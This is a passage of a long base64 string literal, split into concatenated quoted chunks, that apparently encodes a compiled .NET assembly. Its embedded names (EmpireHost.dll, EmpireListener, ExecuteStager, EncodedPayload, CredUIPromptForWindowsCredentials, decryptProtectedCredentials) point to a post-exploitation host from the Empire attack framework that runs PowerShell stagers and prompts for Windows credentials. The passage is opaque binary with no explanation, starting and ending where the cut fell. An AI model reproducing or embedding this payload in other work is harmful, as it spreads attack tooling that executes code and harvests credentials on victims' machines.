"AAAEAOQbAAABAE4KAAACACITAAADAKUIAAAEABkKAAAFAMgGAAABAE4KAAACACITAAADAKUIAAAE"+
"AOQbAAAFABkKAAAGAMgGAAABANYZAAABANYZAAACABkKAAADAMgGAAABANYZAAACABkKAAADAMgG"+
"AAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAJcEAAAB"+
"AEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABACITAAACAKUIAAABAEgN"+
"AAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAE4KAAACACITAAAD"+
"AKUIAAABADEUAAACAEAKAAADAC4FAAAEAK8WAAAFAA0KAAAGAPsZAAAHALwGAAAIAOgZAAAJAE4N"+
"AAAKAH8YAAABADEUAAACAK8WAAADAHEIAAAEAOcUAAAFAIENAgAGABMVAgAHAKkNAAAIAE4NAAAJ"+
"AH8YAAABAH8YAAACAA0KAAADALwGAAAEALkYAAAFAKQYAAABAH8YAAACAA0KAAADALwGAAAEALkY"+
"AAAFAKQYAAABAH8YAAACAPYUAAADANoUAAAEAA0KAAAFAP0JAAAGANUJAAAHAGoKAAAIALwGAAAJ"+
"AKwGAAABAH8YAAACAPYUAAADANoUAAAEAA0KAAAFAP0JAAAGANUJAAAHAGoKAAAIALwGAAAJAKwG"+
"AAABAMwYAAACAPQWAAADAL4NAAABAMwYAAACAPQWAAADAL4NAAABAI4UAAABAI4UAAACACcQAAAB"+
"AJkEBAB1AAUAiQAKACQACwAkAAkA3xYBABEA3xYFABkA3xYBACEA3xYKADEA3xYQADkA3xYQAEEA"+
"3xYQAEkA3xYQAFEA3xYQAFkA3xYQAGEA3xYQAGkA3xYVAHEA3xYQAHkA3xYQANkB3xYBAOkB3xYB"+
"APEBHwgeAPkBqw4kAPEBhQ8qAIEA3xYBAJkAaBs8AAEC3xYQAJkAcRVBAAkCawdIAJEAoxEBABEC"+
"EBZRAIkAaAtWABECYxtRAIkATwdbAIkALRdhAIkArQhnAIkAYAsBABkC1h10AIkABRx5AIkARQZ5"+
"AIkAIBd/AKEAIBeEAAwAdxGSACkCJBqYAIkArQiiALEAVwbBAEEC3xbHABQA3xYBABQA5wTYABQA"+
"nwsBABwA+xvlABwAdxGSAMEAwBrpAOEAPQLtABkCHBDlABkCjw/zAAEBvwoQAIkAGRQEAVECbwsK"+
"AYkAixQBANkA2BAVAIEAfA8QAWECxgQUAWECGgsaAWECBQsaAeEA3xYBAAkB3xYfAWkC3xYQAPEA"+
"NwUnARkCoRpNAQEBqAtVASQA3xYBACwA0RZxATQA7xuEATEBvBAQAQEBlQoQAHECewqJATEBhAkQ"+
"AcEAtRqNASQAgBGTAXkCtBybAYECYAsBAAEBlQpVARkB3xYBAPkAGguvATwAzxrzABkCrhq8ARkB"+
"UAbGAUQA+xvlABkCmREQARkC2xXVARkCrB3bARkCoRrhAUwA3xYBAFQA0RZxAVwA7xuEAUwA5wTY"+
"ABkBqBofAhkBHBDlABkBVQ0rAkwA+xvlAFEB3xY4AnECqAtAAnECIBZLAnECWBZLAnECNBZRAnEC"+
"bBZRAnEClQpAAnEClQpYAhkC3h1kAhkCKxtnAhkC3hluApkCfA8QATwA3xaAAkQAdxGSAEEBvBAQ"+
"ATwA0xqGAgEB3xYBAMEA3xaNAsEABhiSArEC3xadAmQA5wTYAGwA3xYBAKEA3xYBAKEARQbKAqEA"+
"8hXQAmwA5wTYAMECdRp0AKEARQbXAmwA5xzeAskCtw/pAtkCzgrhARkCoRrwAuEC1goCA5kB+xwH"+
"A5kBPw0OA5EBTR0TA5EBFRIQAdkCWQoZA+kC7wgeA5EBQR0nA3EC5Q8wA3EC8RowA6kB3xaAAqkB"+
"2w/lAKkB5hrlAHECzQ00A3EC2w0wA3EC6g06A3ECtAg/A3ECBRAwA3ECExswA3EC1xowA3ECfRQw"+
"A7EB3xaAArEBLQTlALEBZQTlAHEC9xI0A3EC9Q8wA3ECAhswA3ECMQ40A3ECUAmJAXECWglAAiEB"+
"3xYBAPkCUBRDA8kCrxFGAwEDvRFMAwkBFhblAMkCwgmJAWkB3xYBAGkBnBRmA2kBXh0BAAkDRAiE"+
"A/kCuB2LAwkDaBGRAwkDnRYwAwkDZhGWAxED3xYFAAkDKwifAxkD3xYQAGkBHBDlACED3xawAwkD"+
"sAC2AwkDNhC9AxkC7xzHAykDOhzMA3wA3xbpA4QAmQ/2AyED3xYQABkB3xYFABkBkh3lABkBnx0F"+
"AAkDpgAlBAkDUQ4yBA4APABLBA4AQACGBA4ARACnBA4ASADGBAgAhADJBAgAiADOBAgAjADTBAgA"+
"kADYBAgAlADdBAgAmADiBAgAnADnBAgAoADsBAgAqADJBAgArADOBAgAsADxBAgAtAD2BAgAuADT"+
"BAgAvAD7BAgAwAAABQgAxADdBAgAyADiBAgAzAAFBQgA0AAKBQgA1ADnBAgA2AAPBQgA3AAUBQgA"+
"4AAZBQgA5AAeBQgA6AAjBQgAKAEoBQgALAEABQgAMAEtBQgANAEtBQgAOAHdBAgARAEyBQgASAE3"+
"BQgATAE8BQgAUAFBBS4ACwDJBC4AEwDVCC4AGwDeCC4AIwD9CC4AKwAGCS4AMwAWCS4AOwAWCS4A"+
"QwAWCS4ASwAGCS4AUwAcCS4AWwAWCS4AYwAWCS4AawA0CS4AcwBeCUMAYwBrCYMBCwDJBMMBewDJ"+
"BOMBewDJBGECgwDJBGMCgwDJBIECgwDJBKECgwDJBMECgwDJBOECgwDJBAEDgwDJBCEDgwDJBEED"+
"gwDJBKEHgwDJBMEHgwDJBOEHgwDJBAEIgwDJBCEIgwDJBIEIgwDJBKEIgwDJBMEIgwDJBOEIgwDJ"+
"BAEJgwDJBCEJgwDJBCAPgwDJBEAPgwDJBGAPgwDJBIAPgwDJBKAPgwDJBMAPgwDJBOAPgwDJBAAQ"+
"gwDJBEAQgwDJBGAQgwDJBIAQgwDJBKAQgwDJBMAQgwDJBOAQgwDJBAARgwDJBCARgwDJBGARCwDJ"+
"BAASgwDJBCASgwDJBEASgwDJBGASgwDJBIASgwDJBKASgwDJBMASgwDJBOASgwDJBAATgwDJBCAT"+
"gwDJBOATgwDJBAAUgwDJBCAUgwDJBEAUgwDJBGAUgwDJBIAUgwDJBKAUgwDJBMAUgwDJBOAUgwDJ"+
"BAAVgwDJBCAVgwDJBEAVgwDJBK4ARgWwAEYFGgAwAHAArgD5AP4ALAGfAecBMwJFAlwCcwKsAuQC"+
"9wJSA3ADpAPCAwEEEQQdBCsEAwABAAQAAwAFAAsABwAMAAoAFwALABsAEAAfABEAJgAAAFIbgggA"+
"AA0IhggAAB4LiggAAAkLiggAAJ8EjwgAAGUKlAgAAFgCmAgAAMERnggAAO8EgggAAIoHpAgAAFUC"+
"qQgAAHAWrwgAANANtQgAAMISuwgAAO4NhggAADgWrwgAALgIgggAABsOtQgAAEMOtQgAAPoSuwgA"+
"AEYOtQgAAHgJlAgAABAKlAgAANgJlAgAAL8GlAgAABYFgggAABAKwQgAANgJwQgAAL8GwQgAABYF"+
"gggAABkTlAgAAJwIlAgAANkbxwgAALkVxwgAABYFgggAAIEYywgAAO4HhggAABkTlAgAAJwIlAgA"+
"AEMKlAgAANkbxwgAALkVxwgAABYFgggAAIEY0AgAAO4HhggCAAUAAwABAAYAAwACAAcABQABAAgA"+
"BQACAA4ABwACAA8ACQACABAACwACABEADQACABIADwACABMAEQACABQAEwACABUAFQABABYAFQAC"+
"ACIAFwACAD8AGQABAEAAGQACAEEAGwABAEIAGwACAEMAHQABAEQAHQACAEUAHwABAEYAHwACAEcA"+
"IQABAEgAIQACAEkAIwACAEoAJQACAEsAJwACAEwAKQABAE0AKQACAE4AKwABAE8AKwACAFAALQAB"+
"AFEALQACAHkALwABAHoALwACAHsAMQABAHwAMQACAH0AMwABAH4AMwACAH8ANQABAIAANQACAIIA"+
"NwABAIMANwACAIQAOQABAIUAOQACAIYAOwABAIcAOwACAIgAPQABAIkAPQACAIwAPwABAI0APwAC"+
"AI4AQQABAI8AQQACAJAAQwABAJEAQwACAJIARQABAJMARQACAJQARwABAJUARwACAJYASQABAJcA"+
"SQACAJgASwABAJkASwACAJsATQABAJwATQACAJ0ATwABAJ4ATwACAJ8AUQABAKAAUQACAKEAUwAB"+
"AKIAUwACAKMAVQABAKQAVQACAKUAVwABAKYAVwACAKcAWQABAKgAWQACAKkAWwABAKoAWwAYESIR"+
"igDSAN4AYAFpAXsBtAHNAQsCEQIYAqMCwgKcA+ID7wMAAT8AYwgBAAYBQQADGQIABgFDAEEVAgAE"+
"AVkB6BgCAAQBWwEDGQIARAFdASQVAgBEAV8BJBUCAEQBYQFBFQIARAFjAUEVAgAEgAAAAQAAAAAA"+
"AAAAAAAAAABqHAAAAgAAAAAAAAAAAAAAOQRzBAAAAAADAAUAAAAAAAAAAAA5BPkKAAAAAAEAAAAA"+
"AAAAAAAAAEIEIhIAAAAAAgAAAAAAAAAAAAAAOQSSEQAAAAANAAUADgAIAA8ACAAQAAgAEQAIABIA"+
"CAATAAwAFAASABUAEgAAAAQA1wDhAwAABADxAOED1gBhA9YAawPwAGED8ABrA2sB3gMBACQAAgAk"+
"AAAAADw+Y19fRGlzcGxheUNsYXNzMF8wADxUb1NlY3VyZVN0cmluZz5iX18wAElFbnVtZXJhYmxl"+
"YDEAQWN0aW9uYDEAUFNEYXRhQ29sbGVjdGlvbmAxAFBTTWVtYmVySW5mb0NvbGxlY3Rpb25gMQBJ"+
"RW51bWVyYXRvcmAxAExpc3RgMQBNaWNyb3NvZnQuV2luMzIASW50MzIARGljdGlvbmFyeWAyAFJl"+
"YWRJbnQxNgBXcml0ZUludDE2ADxNb2R1bGU+AENSRURVSVdJTl9HRU5FUklDAEhhbmRsZUNvbnRy"+
"b2xDAENSRURVSV9GTEFHU19SRVFVSVJFX1NNQVJUQ0FSRABDUkVEVUlfRkxBR1NfSU5DT1JSRUNU"+
"X1BBU1NXT1JEAENSRURVSV9GTEFHU19WQUxJREFURV9VU0VSTkFNRQBDUkVEVUlfRkxBR1NfQ09N"+
"UExFVEVfVVNFUk5BTUUAQ1JFRFVJX0ZMQUdTX0tFRVBfVVNFUk5BTUUAQ1JFRFVJX0ZMQUdTX1JF"+
"UVVJUkVfQ0VSVElGSUNBVEUAQ1JFRFVJX01BWF9QQVNTV09SRF9MRU5HVEgAQ1JFRFVJX01BWF9N"+
"RVNTQUdFX0xFTkdUSABDUkVEX01BWF9VU0VSTkFNRV9MRU5HVEgAQ1JFRFVJX01BWF9VU0VSTkFN"+
"RV9MRU5HVEgAQ1JFRFVJX01BWF9DQVBUSU9OX0xFTkdUSABDUkVEVUlfRkxBR1NfQUxXQVlTX1NI"+
"T1dfVUkAZ2V0X1VJAENyZWRlbnRpYWxVSQBnZXRfUmF3VUkAQ1JFRFVJX0ZMQUdTX1BBU1NXT1JE"+
"X09OTFlfT0sAQ1JFRFVJX0ZMQUdTX1NFUlZFUl9DUkVERU5USUFMAENSRURVSV9GTEFHU19FWFBF"+
"Q1RfQ09ORklSTUFUSU9OAENSRURVSV9JTkZPAFN5c3RlbS5JTwBDUkVEVUlXSU5fRU5VTUVSQVRF"+
"X0NVUlJFTlRfVVNFUgBDUkVEVUlfRkxBR1NfUkVRVUVTVF9BRE1JTklTVFJBVE9SAENSRURVSV9G"+
"TEFHU19FWENMVURFX0NFUlRJRklDQVRFUwBDUkVEVUlfRkxBR1NfR0VORVJJQ19DUkVERU5USUFM"+
"UwBDUkVEVUlfRkxBR1NfVVNFUk5BTUVfVEFSR0VUX0NSRURFTlRJQUxTAENSRURVSVdJTl9FTlVN"+
"RVJBVEVfQURNSU5TAENSRURVSVdJTl9TRUNVUkVfUFJPTVBUAENSRURVSV9GTEFHU19QRVJTSVNU"+
"AENSRURVSV9GTEFHU19ET19OT1RfUEVSU0lTVABDUkVEVUlXSU5fUEFDS18zMl9XT1cAQ1JFRFVJ"+
"V0lOX0NIRUNLQk9YAENSRURVSV9GTEFHU19TSE9XX1NBVkVfQ0hFQ0tfQk9YAGdldF9YAENSRURV"+
"SVdJTl9JTl9DUkVEX09OTFkAQ1JFRFVJV0lOX0FVVEhQQUNLQUdFX09OTFkAZ2V0X1kAdmFsdWVf"+
"XwBtc2NvcmxpYgBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBzcmMAZ2V0X0luc3RhbmNlSWQA"+
"aW5zdGFuY2VJZABzb3VyY2VJZABzaGVsbElkAGdldF9DdXJyZW50VGhyZWFkAEVuY29kZWRQYXls"+
"b2FkAEFkZABnZXRfSXNSdW5zcGFjZVB1c2hlZABnZXRfSXNTYXZlQ2hlY2tlZABzZXRfSXNTYXZl"+
"Q2hlY2tlZABDYW5jZWxsZWQAUmVzZXJ2ZWQATmV3R3VpZAA8SXNTYXZlQ2hlY2tlZD5rX19CYWNr"+
"aW5nRmllbGQAPFBhc3N3b3JkPmtfX0JhY2tpbmdGaWVsZAA8QXV0aEVycm9yQ29kZT5rX19CYWNr"+
"aW5nRmllbGQAPERvbWFpbk5hbWU+a19fQmFja2luZ0ZpZWxkADxVc2VyTmFtZT5rX19CYWNraW5n"+
"RmllbGQAPFRhcmdldE5hbWU+a19fQmFja2luZ0ZpZWxkADxIYm1CYW5uZXI+a19fQmFja2luZ0Zp"+
"ZWxkADxGbGFncz5rX19CYWNraW5nRmllbGQAPEh3bmRQYXJlbnQ+a19fQmFja2luZ0ZpZWxkAGNt"+
"ZABQU0NvbW1hbmQAQWRkQ29tbWFuZABBcHBlbmQAZ2V0X0Vycm9yUmVjb3JkAElDb250YWluc0Vy"+
"cm9yUmVjb3JkAFByb2dyZXNzUmVjb3JkAHJlY29yZABnZXRfUGFzc3dvcmQAc2V0X1Bhc3N3b3Jk"+
"AHBjY2hNYXhQYXNzd29yZABwc3pQYXNzd29yZABwYXNzd29yZABQU0hvc3RVc2VySW50ZXJmYWNl"+
"AE15SG9zdFVzZXJJbnRlcmZhY2UAbXlIb3N0VXNlckludGVyZmFjZQBQU0hvc3RSYXdVc2VySW50"+
"ZXJmYWNlAE15UmF3VXNlckludGVyZmFjZQBteVJ1blNwYWNlAGdldF9SdW5zcGFjZQBzZXRfUnVu"+
"c3BhY2UAcHVzaGVkUnVuc3BhY2UAQ3JlYXRlUnVuc3BhY2UAUHVzaFJ1bnNwYWNlAFBvcFJ1bnNw"+
"YWNlAHJ1bnNwYWNlAFByb21wdEZvckNob2ljZQBkZWZhdWx0Q2hvaWNlAHNvdXJjZQBDcmVkVUlQ"+
"cm9tcHRSZXR1cm5Db2RlAGdldF9BdXRoRXJyb3JDb2RlAHNldF9BdXRoRXJyb3JDb2RlAGdldF9F"+
"eGl0Q29kZQBzZXRfRXhpdENvZGUAZXhpdENvZGUAZ2V0X1VuaWNvZGUAWmVyb0ZyZWVDb1Rhc2tN"+
"ZW1Vbmljb2RlAFNlY3VyZVN0cmluZ1RvQ29UYXNrTWVtVW5pY29kZQBDb1Rhc2tNZW1GcmVlAHB1"+
"bEF1dGhQYWNrYWdlAGF1dGhQYWNrYWdlAGdldF9NZXNzYWdlAHNldF9NZXNzYWdlAF9tZXNzYWdl"+
"AEludm9rZQBnZXRfS2V5QXZhaWxhYmxlAElFbnVtZXJhYmxlAElEaXNwb3NhYmxlAFJ1bnRpbWVU"+
"eXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFJlY3RhbmdsZQByZWN0YW5nbGUARmlsZQBHZXRE"+
"b2xsYXJQcm9maWxlAHVzZVRlc3RQcm9maWxlAEVtcGlyZUxpc3RlbmVyQ29uc29sZQBnZXRfVGl0"+
"bGUAc2V0X1RpdGxlAGdldF9XaW5kb3dUaXRsZQBzZXRfV2luZG93VGl0bGUAZ2V0X05hbWUAR2V0"+
"RnVsbFByb2ZpbGVGaWxlTmFtZQBnZXRfRG9tYWluTmFtZQBzZXRfRG9tYWluTmFtZQBnZXRfVXNl"+
"ckRvbWFpbk5hbWUAcHN6RG9tYWluTmFtZQBnZXRfVXNlck5hbWUAc2V0X1VzZXJOYW1lAHBjY2hN"+
"YXhVc2VyTmFtZQBwc3pVc2VyTmFtZQB1c2VyTmFtZQBnZXRfVGFyZ2V0TmFtZQBzZXRfVGFyZ2V0"+
"TmFtZQBwc3pUYXJnZXROYW1lAHRhcmdldE5hbWUAR2V0RGlyZWN0b3J5TmFtZQBwY2NoTWF4RG9t"+
"YWluYW1lAFJlYWRMaW5lAFdyaXRlVmVyYm9zZUxpbmUAV3JpdGVMaW5lAFdyaXRlV2FybmluZ0xp"+
"bmUAV3JpdGVEZWJ1Z0xpbmUAV3JpdGVFcnJvckxpbmUAQ29tYmluZQBMb2NhbE1hY2hpbmUAVmFs"+
"dWVUeXBlAG5vdFVzZWRIZXJlAFN5c3RlbS5Db3JlAGdldF9DdXJyZW50VUlDdWx0dXJlAGdldF9D"+
"dXJyZW50Q3VsdHVyZQBQb3dlclNoZWxsRW5naW5lQXBwbGljYXRpb25CYXNlAEdldEFwcGxpY2F0"+
"aW9uQmFzZQBEaXNwb3NlAENyZWF0ZQBnZXRfU3RhdGUASW5pdGlhbFNlc3Npb25TdGF0ZQBQU0lu"+
"dm9jYXRpb25TdGF0ZQBDb21wbGV0ZQBXcml0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBH"+
"dWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3Nl"+
"bWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEV4dGVuc2lvbkF0"+
"dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlv"+
"bkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENv"+
"bXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFz"+
"c2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1l"+
"Q29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBFeGVjdXRlAEdldFZhbHVlAHZhbHVlAHBmU2F2ZQBSZW1v"+
"dmUAY2JTaXplAGdldF9CdWZmZXJTaXplAHNldF9CdWZmZXJTaXplAHVsSW5BdXRoQnVmZmVyU2l6"+
"ZQByZWZPdXRBdXRoQnVmZmVyU2l6ZQBwdWxPdXRBdXRoQnVmZmVyU2l6ZQBhdXRoQnVmZmVyU2l6"+
"ZQBTZXRCdWZmZXJTaXplAGdldF9DdXJzb3JTaXplAHNldF9DdXJzb3JTaXplAGdldF9XaW5kb3dT"+
"aXplAHNldF9XaW5kb3dTaXplAGdldF9NYXhQaHlzaWNhbFdpbmRvd1NpemUAU2V0V2luZG93U2l6"+
"ZQBnZXRfTWF4V2luZG93U2l6ZQBTaXplT2YAUHJvbXB0Rm9yQ3JlZGVudGlhbHNGbGFnAFByb21w"+
"dEZvcldpbmRvd3NDcmVkZW50aWFsc0ZsYWcAU3lzdGVtLlRocmVhZGluZwBFbmNvZGluZwBGcm9t"+
"QmFzZTY0U3RyaW5nAFByb21wdEZvckNyZWRlbnRpYWxzV2l0aFNlY3VyZVN0cmluZwBQcm9tcHRG"+
"b3JXaW5kb3dzQ3JlZGVudGlhbHNXaXRoU2VjdXJlU3RyaW5nAFByb21wdFdpdGhTZWN1cmVTdHJp"+
"bmcAUHRyVG9TZWN1cmVTdHJpbmcAQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV3JhcFNl"+
"Y3VyZVN0cmluZwBSZWFkTGluZUFzU2VjdXJlU3RyaW5nAFRvU3RyaW5nAEdldFN0cmluZwBTdWJz"+
"dHJpbmcARm9yRWFjaABHZXRBbGxVc2Vyc0ZvbGRlclBhdGgAR2V0Rm9sZGVyUGF0aABQb3dlclNo"+
"ZWxsUm9vdEtleVBhdGgAZ2V0X1dpZHRoAGdldF9CdWZmZXJXaWR0aABnZXRfV2luZG93V2lkdGgA"+
"Z2V0X0xhcmdlc3RXaW5kb3dXaWR0aABnZXRfTGVuZ3RoAGxlbmd0aABteVJhd1VpAFB0clRvU3Ry"+
"aW5nVW5pAGluc3RhbmNlTG9jawBNYXJzaGFsAFBTQ3JlZGVudGlhbABQcm9tcHRGb3JDcmVkZW50"+
"aWFsAFByb21wdEZvckNyZWRlbnRpYWxzSW50ZXJuYWwAUHJvbXB0Rm9yV2luZG93c0NyZWRlbnRp"+
"YWxzSW50ZXJuYWwAZ2V0X0xhYmVsAEdldEhvdGtleUFuZExhYmVsAHNldF9DYW5jZWwAU3lzdGVt"+
"LkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsAFN5c3RlbS5Db21wb25lbnRNb2RlbABvbGUzMi5kbGwA"+
"Y3JlZHVpLmRsbABFbXBpcmVIb3N0LmRsbABCdWZmZXJDZWxsAGN1cnJlbnRQb3dlclNoZWxsAGZp"+
"bGwAcHJvZ3JhbQBSZUFsbG9jQ29UYXNrTWVtAGdldF9JdGVtAHNldF9JdGVtAE9wZXJhdGluZ1N5"+
"c3RlbQBUcmltAEVudW0AT3BlbgBvcmlnaW4AZ2V0X09TVmVyc2lvbgBnZXRfVmVyc2lvbgBJSG9z"+
"dFN1cHBvcnRzSW50ZXJhY3RpdmVTZXNzaW9uAE5vdGlmeUVuZEFwcGxpY2F0aW9uAE5vdGlmeUJl"+
"Z2luQXBwbGljYXRpb24AZ2V0X0xvY2F0aW9uAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24A"+
"ZGVzdGluYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24ASUhvc3RVSVN1cHBvcnRzTXVsdGlwbGVD"+
"aG9pY2VTZWxlY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24AQ29tbWFuZENvbGxlY3Rpb24AZ2V0X0N1"+
"cnNvclBvc2l0aW9uAHNldF9DdXJzb3JQb3NpdGlvbgBnZXRfV2luZG93UG9zaXRpb24Ac2V0X1dp"+
"bmRvd1Bvc2l0aW9uAFNldFdpbmRvd1Bvc2l0aW9uAGdldF9DYXB0aW9uAHNldF9DYXB0aW9uAF9j"+
"YXB0aW9uAFdpbjMyRXhjZXB0aW9uAE5vdEltcGxlbWVudGVkRXhjZXB0aW9uAEFyZ3VtZW50T3V0"+
"T2ZSYW5nZUV4Y2VwdGlvbgBSdW50aW1lRXhjZXB0aW9uAEFyZ3VtZW50TnVsbEV4Y2VwdGlvbgBS"+
"ZXBvcnRFeGNlcHRpb24AU2VjdXJpdHlFeGNlcHRpb24ARmllbGREZXNjcmlwdGlvbgBDaG9pY2VE"+
"ZXNjcmlwdGlvbgBvcmlnaW5hbFVJQ3VsdHVyZUluZm8Ab3JpZ2luYWxDdWx0dXJlSW5mbwBQU0lu"+
"dm9jYXRpb25TdGF0ZUluZm8AZ2V0X0ludm9jYXRpb25TdGF0ZUluZm8AcFVpSW5mbwBLZXlJbmZv"+
"AFBTUHJvcGVydHlJbmZvAFplcm8AQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV3JhcABj"+
"bGlwAGdldF9XaW5kb3dUb3AAU3RvcABTeXN0ZW0uTGlucQBBcHBlbmRDaGFyAElGb3JtYXRQcm92"+
"aWRlcgBTdHJpbmdCdWlsZGVyAFNwZWNpYWxGb2xkZXIAc2VuZGVyAGNiQXV0aEJ1ZmZlcgBwdklu"+
"QXV0aEJ1ZmZlcgBwQXV0aEJ1ZmZlcgByZWZPdXRBdXRoQnVmZmVyAHBwdk91dEF1dGhCdWZmZXIA"+
"Q3JlZFBhY2tBdXRoZW50aWNhdGlvbkJ1ZmZlcgBDcmVkVW5QYWNrQXV0aGVudGljYXRpb25CdWZm"+
"ZXIARmx1c2hJbnB1dEJ1ZmZlcgBzZXRfQXV0aG9yaXphdGlvbk1hbmFnZXIARXhlY3V0ZVN0YWdl"+
"cgBFbXBpcmVMaXN0ZW5lcgBnZXRfSGJtQmFubmVyAHNldF9IYm1CYW5uZXIAaGJtQmFubmVyAGV4"+
"ZWN1dGVIZWxwZXIAVG9VcHBlcgBmb3JDdXJyZW50VXNlcgBBZGRQYXJhbWV0ZXIASW52YWxpZFBh"+
"cmFtZXRlcgBFbnRlcgBnZXRfTWFqb3IAZ2V0X0ZvcmVncm91bmRDb2xvcgBzZXRfRm9yZWdyb3Vu"+
"ZENvbG9yAGZvcmVncm91bmRDb2xvcgBnZXRfQmFja2dyb3VuZENvbG9yAHNldF9CYWNrZ3JvdW5k"+
"Q29sb3IAYmFja2dyb3VuZENvbG9yAENvbnNvbGVDb2xvcgBHZXRMYXN0V2luMzJFcnJvcgBkd0F1"+
"dGhFcnJvcgBhdXRoRXJyb3IASUVudW1lcmF0b3IAR2V0RW51bWVyYXRvcgAuY3RvcgAuY2N0b3IA"+
"TW9uaXRvcgBhdXRoQnVmZmVyUHRyAEludFB0cgBwdHIAU3lzdGVtLkRpYWdub3N0aWNzAGdldF9D"+
"b21tYW5kcwBzZXRfQ29tbWFuZHMAR2V0UHJvZmlsZUNvbW1hbmRzAE5hdGl2ZU1ldGhvZHMARXh0"+
"ZW5zaW9uTWV0aG9kcwBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcwBkZWZh"+
"dWx0Q2hvaWNlcwBjaG9pY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0u"+
"UnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEhvc3RVdGlsaXRpZXMAZ2V0"+
"X1Byb3BlcnRpZXMAUFNDcmVkZW50aWFsVHlwZXMAYWxsb3dlZENyZWRlbnRpYWxUeXBlcwBQaXBl"+
"bGluZVJlc3VsdFR5cGVzAENvb3JkaW5hdGVzAGdldF9GbGFncwBzZXRfRmxhZ3MASW52YWxpZEZs"+
"YWdzAGR3RmxhZ3MAZmxhZ3MAQ29uc29sZUNhbmNlbEV2ZW50QXJncwBwY2JQYWNrZWRDcmVkZW50"+
"aWFscwBwUGFja2VkQ3JlZGVudGlhbHMAZGVjcnlwdFByb3RlY3RlZENyZWRlbnRpYWxzAENyZWRV"+
"SVByb21wdEZvckNyZWRlbnRpYWxzAENyZWRVSVByb21wdEZvcldpbmRvd3NDcmVkZW50aWFscwBC"+
"dWlsZEhvdGtleXNBbmRQbGFpbkxhYmVscwBTeXN0ZW0uQ29sbGVjdGlvbnMAUFNDcmVkZW50aWFs"+
"VUlPcHRpb25zAFNjb3BlZEl0ZW1PcHRpb25zAFByb21wdEZvckNyZWRlbnRpYWxzT3B0aW9ucwBQ"+
"cm9tcHRGb3JXaW5kb3dzQ3JlZGVudGlhbHNPcHRpb25zAFJlYWRLZXlPcHRpb25zAGRlc2NyaXB0"+
"aW9ucwBvcHRpb25zAGdldF9DaGFycwB1bFBhc3N3b3JkTWF4Q2hhcnMAdWxVc2VyTmFtZU1heENo"+
"YXJzAFN1Y2Nlc3MAV3JpdGVQcm9ncmVzcwBNZXJnZU15UmVzdWx0cwBTY3JvbGxCdWZmZXJDb250"+
"ZW50cwBHZXRCdWZmZXJDb250ZW50cwBTZXRCdWZmZXJDb250ZW50cwBjb250ZW50cwBFeGlzdHMA"+
"Y3VycmVudFVzZXJBbGxIb3N0cwBhbGxVc2Vyc0FsbEhvc3RzAENvbmNhdABBcHBlbmRGb3JtYXQA"+
"QXNQU09iamVjdABnZXRfQmFzZU9iamVjdABHZXQAU2V0AGdldF9XaW5kb3dMZWZ0AGdldF9IZWln"+
"aHQAZ2V0X0J1ZmZlckhlaWdodABnZXRfV2luZG93SGVpZ2h0AGdldF9MYXJnZXN0V2luZG93SGVp"+
"Z2h0AFNwbGl0AGdldF9TaG91bGRFeGl0AHNldF9TaG91bGRFeGl0AFNldFNob3VsZEV4aXQAc2hv"+
"dWxkRXhpdABDcmVhdGVEZWZhdWx0AFByb21wdENyZWRlbnRpYWxzU2VjdXJlU3RyaW5nUmVzdWx0"+
"AElQcm9tcHRDcmVkZW50aWFsc1Jlc3VsdAByZXN1bHQARW52aXJvbm1lbnQAZ2V0X0h3bmRQYXJl"+
"bnQAc2V0X0h3bmRQYXJlbnQAaHduZFBhcmVudABnZXRfQ3VycmVudABnZXRfQ291bnQAQWRkU2Ny"+
"aXB0AEVudGVyTmVzdGVkUHJvbXB0AEV4aXROZXN0ZWRQcm9tcHQAQ29udmVydABUb0xpc3QAU3lz"+
"dGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0AFBTSG9zdABFbXBpcmVIb3N0AGN1cnJlbnRV"+
"c2VyQ3VycmVudEhvc3QAYWxsVXNlcnNDdXJyZW50SG9zdABNeUhvc3QAbXlIb3N0AGlucHV0AE1v"+
"dmVOZXh0AFN5c3RlbS5UZXh0AHBzek1lc3NhZ2VUZXh0AHBzekNhcHRpb25UZXh0AFRvQXJyYXkA"+
"VG9DaGFyQXJyYXkAT3BlblN1YktleQBSZWFkS2V5AFBvd2VyU2hlbGxFbmdpbmVLZXkAUmVnaXN0"+
"cnlWZXJzaW9uS2V5AFJlZ2lzdHJ5S2V5AEdldEFzc2VtYmx5AEdldEVudHJ5QXNzZW1ibHkATWFr"+
"ZVJlYWRPbmx5AEVycm9yQ2F0ZWdvcnkAUnVuc3BhY2VGYWN0b3J5AFJlZ2lzdHJ5AGdldF9DYXBh"+
